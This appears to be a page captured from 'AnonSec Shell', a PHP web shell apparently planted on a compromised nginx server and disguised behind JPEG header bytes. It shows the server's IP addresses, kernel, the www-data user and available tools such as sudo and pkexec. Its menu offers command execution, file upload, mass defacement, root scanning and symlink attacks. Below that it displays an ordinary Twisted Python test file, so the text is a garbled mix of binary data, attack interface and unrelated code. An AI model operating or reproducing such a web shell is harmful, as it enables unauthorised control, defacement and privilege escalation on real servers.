JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 172.67.142.142  /  Your IP : 104.23.197.30   [ Reverse IP ]
Web Server : nginx/1.18.0
System : Linux ip-172-31-29-104 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3/dist-packages/twisted/test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /lib/python3/dist-packages/twisted/test/test_threadable.py
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Tests for L{twisted.python.threadable}.
"""

from __future__ import division, absolute_import

import sys, pickle

try:
    import threading
except ImportError:
    threadingSkip = "Platform lacks thread support"
else:
    threadingSkip = None

from twisted.python.compat import _PY3
from twisted.trial import unittest

from twisted.python import threadable

class TestObject:
    synchronized = ['aMethod']

    x = -1
    y = 1

    def aMethod(self):
        for i in range(10):
            self.x, self.y = self.y, self.x
            self.z = self.x + self.y
            assert self.z == 0, "z == %d, not 0 as expected" % (self.z,)

threadable.synchronize(TestObject)

class SynchronizationTests(unittest.SynchronousTestCase):
    def setUp(self):
        """
        Reduce the CPython check interval so that thread switches happen much
        more often, hopefully exercising more possible race conditions.  Also,
        delay actual test startup until the reactor has been started.
        """
        if _PY3:
            if getattr(sys, 'getswitchinterval', None) is not None:
                self.addCleanup(sys.setswitchinterval, sys.getswitchinterval())
                sys.setswitchinterval(0.0000001)
        else:
            if getattr(sys, 'getcheckinterval', None) is not None:
                self.addCleanup(sys.setcheckinterval, sys.getcheckinterval())
                sys.setcheckinterval(7)


    def test_synchronizedName(self):
        """
        The name of a synchronized method is inaffected by the synchronization
        decorator.
        """
        self.assertEqual("aMethod", TestObject.aMethod.__name__)


    def test_isInIOThread(self):
        """
        L{threadable.isInIOThread} returns C{True} if and only if it is called
        in the same thread as L{threadable.registerAsIOThread}.
        """
        threadable.registerAsIOThread()
        foreignResult = []
        t = threading.Thread(
            target=lambda: foreignResult.append(threadable.isInIOThread()))
        t.start()
        t.join()
        self.assertFalse(
            foreignResult[0], "Non-IO thread reported as IO thread")
        self.assertTrue(
            threadable.isInIOThread(), "IO thread reported as not IO thread")


    def testThreadedSynchronization(self):
        o = TestObject()

        errors = []

        def callMethodLots():
            try:
                for i in range(1000):
                    o.aMethod()
            except AssertionError as e:
                errors.append(str(e))

        threads = []
        for x in range(5):
            t = threading.Thread(target=callMethodLots)
            threads.append(t)
            t.start()

        for t in threads:
            t.join()

        if errors:
            raise unittest.FailTest(errors)

    if threadingSkip is not None:
        testThreadedSynchronization.skip = threadingSkip
        test_isInIOThread.skip = threadingSkip


    def testUnthreadedSynchronization(self):
        o = TestObject()
        for i in range(1000):
            o.aMethod()



class SerializationTests(unittest.SynchronousTestCase):
    def testPickling(self):
        lock = threadable.XLock()
        lockType = type(lock)
        lockPickle = pickle.dumps(lock)
        newLock = pickle.loads(lockPickle)
        self.assertIsInstance(newLock, lockType)

    if threadingSkip is not None:
        testPickling.skip = threadingSkip


    def testUnpickling(self):
        lockPickle = b'ctwisted.python.threadable\nunpickle_lock\np0\n(tp1\nRp2\n.'
        lock = pickle.loads(lockPickle)
        newPickle = pickle.dumps(lock, 2)
        pickle.loads(newPickle)

Anon7 - 2022
AnonSec Team